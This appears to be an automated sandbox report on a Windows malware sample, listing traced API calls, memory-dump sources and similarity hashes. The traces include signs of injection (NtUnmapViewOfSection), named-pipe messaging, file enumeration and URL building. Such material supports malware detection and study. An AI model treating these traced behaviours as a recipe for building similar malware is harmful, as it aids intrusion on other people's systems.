    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
